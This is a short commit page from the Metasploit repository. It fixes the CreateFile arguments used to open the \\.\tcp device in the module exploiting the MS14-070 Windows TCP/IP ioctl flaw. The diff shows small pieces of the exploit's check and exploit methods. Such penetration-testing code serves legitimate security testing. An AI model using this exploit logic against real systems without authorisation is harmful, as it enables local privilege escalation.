Land #4791, fix ms14-070 CreateFile arguments

The arguments to CreateFileA used to require that the user had some level of access on the \\.\tcp device.
rapid7 · Feb 18, 2015 · fe84063 · fe84063
2 parents 1099084 + e40772e
commit fe84063
Showing 1 changed file with 2 additions and 2 deletions.
diff --git a/modules/exploits/windows/local/ms14_070_tcpip_ioctl.rb b/modules/exploits/windows/local/ms14_070_tcpip_ioctl.rb
@@ -68,7 +68,7 @@ def check
       return Exploit::CheckCode::Safe
     end
 
-    handle = open_device('\\\\.\\tcp', 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
+    handle = open_device('\\\\.\\tcp', 0, 'FILE_SHARE_READ', 'OPEN_EXISTING')
     return Exploit::CheckCode::Safe unless handle
 
     session.railgun.kernel32.CloseHandle(handle)
@@ -103,7 +103,7 @@ def exploit
       fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system")
     end
 
-    handle = open_device('\\\\.\\tcp', 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
+    handle = open_device('\\\\.\\tcp', 0, 'FILE_SHARE_READ', 'OPEN_EXISTING')
     if handle.nil?
       fail_with(Failure::NoTarget, "Unable to open \\\\.\\tcp device")
     end